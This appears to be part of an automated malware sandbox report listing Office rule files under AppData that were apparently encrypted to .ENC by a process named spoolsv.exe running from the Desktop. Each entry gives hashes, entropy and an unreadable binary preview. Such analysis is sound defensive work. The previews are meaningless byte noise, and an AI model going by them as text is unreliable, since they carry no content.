                                                                                                                                                                                                                                                      SHA-256:581E54F6151343B162A7004746E4F253BA7708A8996A0E220E1E32B7B6868D8E
                                                                                                                                                                                                                                                      SHA-512:1DAB1BD8030F1F43DDECDC25F239A78C981394A9372C678B623F03057E9803C66B744450941612EFF4C0109BA7B85D3B125C215A2070C4C4DB97795F6CBFA005
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I..9a.S..,..c=).."...o+....u...Q....c..BY...gBo....`$B....M..i..U@..I....TeB$.L...|Vf.D..":...,u...Co<..u..Tc...c.....RG...G...q...Qe8.8....H...1..1...%(.j.G...i|.."e..q......\.Sw.s......ws......S.Os.@V..s?..-.9..}^..d.eZ.B...i.KZ:...&c.|K[..#.yvx..|...>.:.t...$..n....!.].5.E<...........j.E....ZY.+9.kpS+k.H.q.wV.....y6C..1..#....u..I:........vB{W7.q..dZ..h[.....M.G!f.D..!@D..w.......JcV......Y.,.I......5..5..z...JF.L.. P.}..y+.E>...%.15...k...9[.x-.N-.N...R.@M...?B.{.pT...zBrvP4a...Y=u.m.`..^.2..$./.fPm.x....Z]H..........]..s4.]r..lUB5.H.&R...Tr..c_.3Q...~B.........H..+6..(n9...\j3..5j..JG.....C....{.NO>D...ug<.....|.....2u"..P.+Il..|.....0.0-......}:"]v6W[.X.|.T.....v."....T..=.#2....z.].q~... ...*7.Fn..QJ.F.vu..E.W..:/6...).....S.M.........B_.D......a.9..U...N.f......L.......Y.R."...9|...[|m ...;..|rx.J@.T.JI.XTe.......kNM...+.r...X.'0.p.J...ao..m..IP..L..~..K....g....,..u..K\..... ....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700000v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1712
                                                                                                                                                                                                                                                      Entropy (8bit):7.895776845492923
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+VFKXXTeAGhiHJVvk0y15H9QFGkHmzAqs1kfkYzG+29k9iYeXZ8cUsqjP2M1gY5H:+VFKXDXpy/eEkEA5SkypgY5KddUf2Z+p
                                                                                                                                                                                                                                                      MD5:1E6D2E722BA3E7EA80F7E678C4F32C3E
                                                                                                                                                                                                                                                      SHA1:81522FF01B86662BC263C3E6ACFD3C0EAB16D7A9
                                                                                                                                                                                                                                                      SHA-256:2AAA888997301B6AD71F868B380E480CE2A95BFB537A313B2B70DEEF175B4BA8
                                                                                                                                                                                                                                                      SHA-512:8317CCF6A21A17472D272B3A0D3EC5687651F95A1EB20E6940578D028EAC9F8AC412F60D332BAF65D4FD92056147FC7342BA7ED13179C9AE6A30A7B9E56075FA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..)..Q+.9C..........6 ..?gZ.{.ySr...b....A....KX......Meq{.P......W.S.z .bTV.@..Lm..s.}6<.......|.....X1..;.[.A.n..Gr....5...O..QjR..'.^...K.M=....c....#8.|7...2..d.@...G.......\......iA..?.u.!`..idp...'.P8.0.....0..e..hJ.z..:.Jn.!.Dd.K...Vl......?)Z....? ....r...7M9...........B4./~"..2...t..c).(A..1..2.^../..-.B.L/[..._.dp...$uk..........N.._K....*jL..(..E.m1.K.Z..$.....$v....6o..n..t...#~.K..pk.<.......T2.H7.......C1..O..;8...6.MSkf.->R...!......N.`..'.t.....9.z....=.-!....x.%Z5..n.X...8GAY....G.d..=/}.G.N........ ......9..t.)..7.9gi..|.A...'.Ic/. ....r.j.Hz......9%..e.l.*..B.....2..1t..0...>[y...E.........ys....c.......G...nhI.lG.)fr3...Y.OU1.E.j,i8. .!......H.g)....X....g........x..5..F.?b]._......*.).T)^_u.!..1..0..'...&N`.z..v."...%[t.\..h5u5...W...A....77...}vV.}...B#/B.0.NN....(_.M.........p....P..A^&6Z43G..v'.G.n..=.....:.p...{X.d.pV._.~{.%N.{N.DoA...o..z..........e)o...&.......uR.....Ln

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700001v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1744
                                                                                                                                                                                                                                                      Entropy (8bit):7.891532118040202
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+CjfLRe4EzQ1XhqjFFNJg4keSMISQaav7s+TkzTWY8bge:+81eTAxq5FNJvgtaazDTkzaYax
                                                                                                                                                                                                                                                      MD5:E4BB9D54F69D7949D978E72D5DB6A336
                                                                                                                                                                                                                                                      SHA1:92B5FDB9ACFAEB46AEC1D7EE0E09CF3994A36AD9
                                                                                                                                                                                                                                                      SHA-256:3A22B07B02B3E4C6E1CD33F9A6A169CB7AB126DBFB1035D003F3773AC0D602AB
                                                                                                                                                                                                                                                      SHA-512:D9C6E6B3133C84923A53C908CF7314D684CD9BEA70F1367118D7E992E1954C1A33E49B8B54BF8ECB7C9AFB3FD5118BFB7736A1A5F9CF62E2B9F2E7181C72C719
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..........B.....T...C<..V >"....Z....h.s.....j..F{i.5..V..4ub.n.g..........vWM..%...b`\..&.or.#oG...h.+...FZ?.3.f9...:.l....*.@..E.R..... %?!......K'O.5.b.<..'...gR.c.(@h-..... .|...n.-d.;.Ad.K9c.......7.O..\.8ZJ..CKW_.1.(9=..'.1..$-.1D..2*q(.> ..g2f.....-.V.......f4.U.i`...dn.....t._..5j..G...>...*....m....F.t.....ss...........5..2..P)>0..+..&...*Q..r.5r.k.lmS...Y...I.A#$..x...*&..}.S[.../tR...i.c.U!C....U;.....A......4.%.@....x.....)..8~.q..HU.C.......C...4R.]m..b...O...........u...T.R.[.@..r(.p.^..jU.k....D.......6's....rHf....v......C...`..#.+3._d..P..P..).5.XxW. .|............?.3J...8.....].e....%..k^../c....H....H.I.{:..~.u{kI);.<..6....02....XE/Y.....7...4G..31.3*?.p*.Zy~C?,K/..5.B...^Y...;..wQ..=R......D.9[...$?*.A.U..b....Oc.Gs5w`O..u...n.w*.....e...3MJ"y.K.8..i....=M........$.p.w.y.ytH..*l_&<...vE$.x.zM.m.g.B..b..2.k......+|.=.4.yV.R..b.T})v.j.6..m...Es...e...ub..`.+]..P.2.(.wC.).

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700050v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.871528582035446
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+i8HWzu/x9uIIwD6DDO3mn7zkXHfSGieKCgP/Too5ejiKWFitmZCQrHYJB4x5qa0:+Z//8wODDO2n7zoh3gjqoitm5TO4xYua
                                                                                                                                                                                                                                                      MD5:145529B741A700D718C5D1A285064014
                                                                                                                                                                                                                                                      SHA1:3D18EBE3C1FA428C38A44DFCB642ECD6D27D220B
                                                                                                                                                                                                                                                      SHA-256:261B2A1003E0687B1BF9D2BE3F0CC787D47DCBB102042608445FE58A7EE1C7B4
                                                                                                                                                                                                                                                      SHA-512:E90523C206DFF464E72EE45C1562CE3CC7F0A22A3EEABD78F60EA26A03B31ED5FECE333465698DD2587EB7E97868F6A539256F75479F91BAE5C1A59E73319D73
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.y>b...3.<....P..e}gQ..z.k&/.S..J..kR...#.>..-.....-..bf...5.I&T..%..Aj..n......N...d.s..0..H..%.&F..Y...I|..;.W..O9....IT.Sk..V!.).../HR..`..D..E.........4....Jg....;..Oy.8.v...J....l..)o$?.. .....E..$...Q.:I.....<.$#.T.`.$9.....4n.@....W.v[H..)..\.:..u2-.O.6H.o..=.KN.{.\.i"3.8..m.i.>8.K...&.6-...s..Q1C).e..%. .y........a..Z.0{.....;^..h.u......*............fTW....@q..,f........j....,.....^.G..N-.D.$*R.sr..i..b..Xm.5..V......'.E.P.w..m.+..d~.#..&(>.T%....49.!.o:....=y.Q........+. fW..n......p5:.8.C....Dg.Fr.{;|.Cu6[....h.b$........Vj..qM..o5..^m..J...<.L.^NJ..fJ...a.rhG...Bp-.r..0,I.{....y...o.=...Q..)]f4.....6...^..26..Z..{......]o.Im......<..6..6..*.sJ..8_.+`....C{......Mo.T.rw.|.}XIBt..oW......hl.h...Uvaejs.....?."IA.8..RN..p......Y....\...q.7B...=S-....%6..o.....|...R".;.3.."c_..Z...0.+..,e.e.%..X.O.O....H.h|..J.A.,.+.l!...Y....E.#.Q....,.7.~..5.b....l....}._"...5.Z...z.Q.......S..._h..7.j.!

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700051v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.857391989325707
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+CLN4AWkwhWVBA83lj8bg4ZRRFTTd+ptLsTd9npRIg7HJo3oKfu1X2lFq:+wNWkwwL3lj8xZRRFTCLsTPnpR/oYUq
                                                                                                                                                                                                                                                      MD5:90E45B32852BD820D758D467C6A3F5C9
                                                                                                                                                                                                                                                      SHA1:33CBB32EDD47D43941446205318FB02CF9BC08C6
                                                                                                                                                                                                                                                      SHA-256:B55570E6DF3B0C3B7826A3F1977C73CADF3E5645405B80783E2C69D3130265A3
                                                                                                                                                                                                                                                      SHA-512:571A034E1A36B6FCA381EAF0649DC10D29C0F584B717BA2D1F1FFECAF32105DE035B88BDAF047A151F3FEF294B7BCD7364067F034D3851CF6FCDD2499A9B1BED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F......g....F<2uW.|......%.yO4......9.....0{.....<......{..'.....d._.....JES._Hp=..X....5..'.....6...7..z...2..f...[.."..b+}..#.K.VX..!..9e....v2.*..gk...Anm#..D`..$c.Dj...%.:.2a..M0%.?.K[d...=..C......|.."f.....#..l.E..W..W.'Z........|4...-.q=x.3..c..&...Mt{3.+.{......F..A......:....K.0.j...4.r7..6.y.qZZ".l?.if.u.k}....c....!dL.........4.U~.nl..W..>O.....oO\e.r7D.LFp.....7..{.y.Y..R.`WZ@q.......8..>.m.[...D.I....MF`.(M...Z..D\3v..2t...,. [B/.P..A+.^.........B{b.p*...:..+...'....i.GM.....L9..bm...........q...D.....uf.W1.L.JT..FF~.v.Q..p1z>.o.a....n,..n...h..0.........w..( ....,Cr.7........f.O..\.........*A~hi.w....%C....0.t..z...3..tV..Rf@....."..2ET...1..'..G..+c1[.|p.uvS...C[0.z..`..]...}}..7.8d. ..ST,...d!.....+".%.w...}.H.6...wh.(.....+...*r/.f.m.'1^.!b0wO.....BL...mSr.a...o9.Pj...W....\....?h..9l...]n.....D...).....6.d.yDT.........5(..0.x..{v...-..bB. ...0...f...H.1....;M.6..t.t...ZP...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700100v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.845090292658586
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+UoAQa7uUHl8clmpCeUtw4czdjmpFu848XP+ozu0MZXN3arN6I1PWP+Jy/5npp:+UorsBHSc8Cxcozux8XuZ3eN6IPWGJyF
                                                                                                                                                                                                                                                      MD5:5893D844083E34160EC1F8CCD10CEE2E
                                                                                                                                                                                                                                                      SHA1:B25F9947BF299EDB1CC4015AB5C870848AB6EEFD
                                                                                                                                                                                                                                                      SHA-256:C2686D4D5C9AED1AB5EA9F62C88F3BBEBC2DEBE4540061DF684F471C98D7BA2D
                                                                                                                                                                                                                                                      SHA-512:6DB183F781FFD5FC0A08D3CF1E89CCC1A02BA78C0767D26DB0CD4FCBB6551420638B74B08218AACFB1917D1D755AD5025804B9CCF3DB16A2BDE43CD63E3A689E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.z......R.....`..O..hx...=.D..x*>.}.8..[=.a.y.e..B.....`^$..._X..A..J...@.6~...0.^.w4<.....&.V8r..0.v{.2......p.F.L...>W..a...U...[....-.....e(R.."w.=.Wa.wx.d...<>.>..N.........r'..3.Tn......+........3+A.3.....E.J..B...Y..0.....CD...,....q.i=>.4.$....6..........f..ErhQT;.[I..<W...E.!:.(In...^.z#PB.&%..</:./{...~.....A...3.....N.F7e.$%....^1B})......t...)Ev....[F.....dx|.w..iZ...2..n$......d.b=$.'.e).sr......K....'..F{.=.e.H..y.-.m`.;.p.....5....(.%...%.K-.EB..j.."...B'..7.:.G.c[a`.bi...K.x./R{W.....[x...C....u../~...#..X..[j.}..........e2#.!'_.=..D.6...j}'.a........)Es...].......Et...oC.....D_...H.pO".~.........`.......S..QUA..506.d.ffF.B.....}..P.%t.....L ....W1.....+.q.>....<?..yW...2u....".........(.%.(.;.O.....D|..q.6?....E.;..-......R..I!...0..i...F..=.K.,..agF.n....[k....o.=.}.......F.k.._.\..T.m_..K.....]!.....@$.6r'..e..._...Q..q.{..,..n...8...@..2>%.w..g.IKu.g...g*.i....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700101v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.86295840340974
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+13OOfCN50LUArYlQmePYV+T6xIUO08luwa4mUlZfUuh38iidqNf8iz4AgJW4:+6Ac6zz6xZO0pKZfUM8iUqNf8iA9
                                                                                                                                                                                                                                                      MD5:4B165A1EA326502F1CBFB5D57CCC96AB
                                                                                                                                                                                                                                                      SHA1:E7D958CC178E07A934B5DE30FA02F0A8C064CDAA
                                                                                                                                                                                                                                                      SHA-256:4B199C22BB1EE7A6F7B67FC6E0A6330758FC5963176C8C085962D1229AA397C4
                                                                                                                                                                                                                                                      SHA-512:01583718C467DA6E1A1BC5BFA35157F16EBA1404FCFF030D24E8131F3449AF7932E544EDC7B89C86F9BFEEE288EFC054F20D2F4AB965AFEBF33A58E9482B2D16
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.Z.).U~....Z.`..X_.......^......]!.I.L.0.h.....Z.;...[....=>.@RZ.4...-..Z.......k7"J...$.M?.f.....+.zuN.%..MH=...4.]...U.....i....b#..Z;.X......%.2...G......!.....">..91&......C.g...H.Im.#NS..F..o8p..M.......Na....[9..+.(.mh...L.-..K.,..g5F\._..8...R...m4..{..V....*.S...`., 5=g.......%.b./6cMs...k..{....d.Q<.!...9.w.R.kDv*\.,.R....4.D........R..=Uf....o.<.K...V.5J......... en.$A..\./.ZER.s..*.....sZ..`.Cx....E...|.G.&.p...x...Z...w+..<...$..)(:.....d.;O8F=\%......M%..T*...f...+..F.-..*F.]...G..ak.X...|....@b../.0.g.S.=.J.q..a...=&-p....r{...kf.aD!;...z.....F,.%..r....(A..H.%r..,.B.[...*.yl.!......m..NL5#Z..*.......y..[Q....f..n..Y....SS.....Q......7v.i...=Li.I.2.{..9...z.I.j..Y .f.<.I.HF........&}3.{t..L.RoP...&S.sn>0}.GN.....aa...>....v..&..Fi.:..Fwl..mLfO.\.B....K'...{..Z...).6..i.%.X..T..G........v[...B..tH.....h..d..@p.........lH.......97..|/.?.'.Q4.4.W... ..%0.5.HSfX.Lq.k...j

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700150v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.859494232469517
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+OVHHTUrG5RnnQgs0m/UhEaAxfOfSa7NeIcj5RpvnXC2/CQZNT:+OVnTUa5Rs0mWXSOezjbJSxQL
                                                                                                                                                                                                                                                      MD5:0740327EA698B60E90393410531F9255
                                                                                                                                                                                                                                                      SHA1:FD431E2BD24CAD82F45315109FED626E2A7A5983
                                                                                                                                                                                                                                                      SHA-256:EB211FF5EAEBD5CA14508C713386E014116BC0F701860DF4D7C7513EDF389DF0
                                                                                                                                                                                                                                                      SHA-512:5763065186BF1D59F68247ED608DFE8D115BF4C5A796B7DF54BBC043ADB2C6AE3FE2A041B9639998D0779217C24D808BBC1F9E0FC2031C663E5D3FFA051CA344
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.o.....c$.c@.m#..U...%........`.....]}.3.{.z.E......?.>.............(m..V2)u..v.0^e.Q.....aO..'..n.-..v.F.+.Z#.....5.....U.:...}..u..k....{..[..Y%....M....f!...'U.KB.............o..`.1|:...........T._$tr....h.........O=..&]R..a.dZ....4.5.^.Yc)23.>..2T-.....gH...hO..P:_l...-[.'.....@.....yu..(Q5[h@/.6..|.p$...$...|.4..0...q..N\`_..V....A,[Y.oMGw+.?..,.......yZ.=..?....K5.*.}.....@..|wK.......|...1t..8.I.$.f.j,d.w..t...\..=.,..4.?.l..}.\...T...5....._...OK1.4..1.{Gdv`.N]..[._c....`........#.F.tG.O*r.&<.....:..._n!.h`.qJ....c^.h..%....4.P....L..*...W.KF..y.y...R.a.WZ..`.Xt1G.._.._.,V+..o.1....]c......&.H...@.....?..^...3f........gRc....)..-St.Z..)I.......{R....C........t........z.`....I......Z....c1.k...........8...D.....K..(.x.."xk...$)A..'.....x...X....p...z..0..."M.~z..q.....[.....f.v1.[....|..^U.m@.S..[.......#.=.YW....."...h..."F...i......$dPw....N.....-N.j.6..h.e:....w...E.i3.w....W....f.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700151v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.877891766438841
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+2Gh7+tbxwb6pSHH0yID4nAE9VXiVhZlz1Fh5ymEigiTZ62advmYV12ZOww33JsP:+b+tdwbqupDJCh/1Fh5yHigiTqYrcwwm
                                                                                                                                                                                                                                                      MD5:25EC30E6A7E4F4FC04A8C7785CE879C5
                                                                                                                                                                                                                                                      SHA1:C37C66FB58C20A35DA0539177ED4132ED3D79CFB
                                                                                                                                                                                                                                                      SHA-256:D65F628CDAF7C514647C9F65F54E9A0B7DB856F62372BDF5F6A95F97D327E7D6
                                                                                                                                                                                                                                                      SHA-512:201E2CD9B8AF9665494433C34937AD36CCDA8029F473A0D446AE4C9BA8C9643857DE3CC539CF2293B132DB8BDE855465DEF970CFAB369EB8ECEE9C81611C24E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.ll..+[U...t..s..,W..3>4.....u.{2.<!.Q<>..Y.-u...Z(H.{....>.....oK..._9j.c....0..P.q$c#.......z....l.#......}.+,...#..s*.gl.A@.....rv....,.0\.!a...J..^....o.Y..j.3n3O..'.%>V..x.b.0*voi...X.R6..~.Y..f.g... ....v.Z.x......R.......9.h.............{...*..Jt...1..m.(\.[....rv........&.IW..+.....+.l_.k..f|.H;!o.b.~.....?r..JY..+....M....p.V....".w@s..n.\.......9...;...........T~.....$.....X...5..... ..&.a}F...;.98..:..X.s.Ol.?QU..........@wuJU.".Y.>[..Zih.!/.;,.k=.X..,(.i...`.M..I.1..I....]K..../\u2.).1"c>..3 .GW....(.....'....:V".+...U#..1..#^...0..._ .....ZL...~}.q.9.........hj[.!!.9..].....1..)...~.V2....<Y..1...%.....W...o....NF]..!..S..)..e......v.......x....N...@mNs@U....@..4Q$K....b9$_.9.V..t..b..o...H4YkXO....B.V.b.....vP......x.1k...r.....v9..m.,:a..q.4..2.(N.d..Y.+..[...|......+v=...RK.[.T.......&......-.d..T.....ub#.....1..z.B<.R.-h.F>...]:...y..P.(.#.....=...B..)u.....B%.A.!...G...fRjH+.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700200v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.874923941594238
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+V6oxtztQ00A/TnnA9W5qH9ZdWCVwbDzAU/ttD2J+rXxOVsy6VAj6UU3mMr4n:+iAr/5q3dWywHzANI1U6VAjhV
                                                                                                                                                                                                                                                      MD5:166EB596CB06AFCC039637EED27EFA07
                                                                                                                                                                                                                                                      SHA1:A09DEDEF06B0059026651928715DB4E9D22D1F82
                                                                                                                                                                                                                                                      SHA-256:8CEBD0312A3F74CAA2B1A0FD4904F035C407B088AB57C6B1FF04A2972F26F8BA
                                                                                                                                                                                                                                                      SHA-512:4D678E2C9A022331842A88F05539714A753BEC6F373C80BCDC888E928BC26D5ECB20A7EDFABF426929D6FE3E1229E2999FF9C97288CE5AA2DCD67C33892628DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.G.`.Bp+a...........tn.3,".'.........."`S.E...z<7+)`..$...I.h.}-)K.....B..#[..8[I>!.....a..H5.. .i..h...>.4S;W.=.*.<sF/6.....'...1....'.C.Y.4.>.........t.......bZK......Y..!.*.]....`.,....F.K.M.....N.....}.S..2.....O.ri|.in..J.i...m..Rf.{.6..!'3...?0L^......bM.|.ex-z...=..!.I.uR......5....c1...J...|x.p..e.fT.Y..9..#_I..o..L.?...X.]....i...<.y ...[.!..dh...M.x......c3../.3...........!.t...\.+.K...*.+8zH.|EJ.A..Y.&.(S.d..x...f.o.!q.H.u7...F....F..N~..d..?.>.?nY.n].....jZk,-Y..X..~ei.w51...y....%<..Qcg...s.f.! ....mJ.v...)...'...6.T../..4QWjv.o...k..6..qG..H0.2...3...]r .vu#...;v..d....>[.c......u....5.}N....u....J. 3.Q<.E.9.4B..9.......`...p....Tk.P1..>z.....O...m..fO.....:...._J.x..5..R..'. ....$.q..g^k...*..e.............'.>..:.......%.Z.......Xi../W.2dp.#U.....q....V}.............2Gf.mP....3e/.}....N;....<..I...bIc.)..=1r&.[.}.....XW.T.....L.!....:...).n5...&@S[U.......J....F.F|.+|.9.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700201v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.878029565038433
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+xw1dC71ZZYimCk2ORVWs5L/5URllEBq3cEVWbWl5znn0nI0yj1oUJgQwa/+QU:+m18h3LtORlJRURllYIpL5zn+yj6a/LU
                                                                                                                                                                                                                                                      MD5:B6293CDF5D0FD3FF38D927F942FCB663
                                                                                                                                                                                                                                                      SHA1:0F2C641536A5A11BB6D3AC9F5A6FC86614C80E50
                                                                                                                                                                                                                                                      SHA-256:EEF0D996AEB0465C6C1789EC7A2089864563D949926FBBCC75C85E2681BAC1DD
                                                                                                                                                                                                                                                      SHA-512:ABA4B91767FCCA2A7AD15B2963F774452AB0319B494E10A87E0DE1445B752109BB8190FC47142C7C9DE92264F4DA0EFB88CA2C92BFD88B706257613170AC0489
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..UK../.4u;...i.%....`.r8x..:....5....6W...v.R...#..`...E...5..S.."Q.S.v..J.....f...h.J.,.fw..p..F.j..k..t78a...u...-5.z...nIQZU..2...$j-.B.Ep..CB...2.L...%...Ke.[:.9.#.....N'..B.-..;.;xi...U...S.Y.o...D. F.1..9t...s...........(.-..81..p?o0..'I.Co/F..S...&N.."ONKT...$......>U...6.p.I..!.my..e%ft%..|.........fX ...Db".jl....N.5,..x).4.<..k....;....y.n.7.4....z.).......).....6..S.....3.:.\..'q....P={.vo..A0..:....2..X.x.]x.*..GX...=?A....0.H.._l9=....g..9...$..*...Jm=S...{t..IC....|M...O3~j..(m.b.xB......eo..m......\..Z_D.m's.).}K.~..N..W...T...3...NEK...(G^.s..+....r.... .e.v....}.'...L.?.Q.B..I.gM.......:.e.....%......vV.W<...Z.V..$..(....9....[....$....O..N.l..7},....:.k..oA. .*.*.\QDs..8....Vj...1.Yc-M\.{i&.Pl>i(..Nva.F/....<...... W....$t$.0....Pu..1......E.$1u,..lk...M......O.l.A8d.....|.RY..N.@....h.C(...z..u....1...g..p..M.|f...LIor...hr$=.5=..97..`~...s.d.;.Zr..sy......iZ...AAG..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700250v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.847581762606015
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Aqvs7RxNWCPXOn2xA0Am2IlR64qK5QSthQRcj4cbk2gRmXmaGVOul6:+AZtxQ7YlApIlw4Z6cg2gSKOul6
                                                                                                                                                                                                                                                      MD5:0A71EEF5C91773042A3A45006E698BE8
                                                                                                                                                                                                                                                      SHA1:BB56EAEF904BEF332B06EB156A1A91BAFFE7A53E
                                                                                                                                                                                                                                                      SHA-256:FB4D5D7229919DA3BE8A36EBE389C87F711C90B13D98CCC6EA09EC8EE7065897
                                                                                                                                                                                                                                                      SHA-512:6F4462B10FE79CA0D97FF2CF8504149052E8704B3C770A7A2875C35D44E1E16D0C1F5B0898D1F9C9A34D639009965C0EDB291964EDB1E866F504FEC0F62DD19C
                                                                                                                                                                                                                                                      Malicious:false
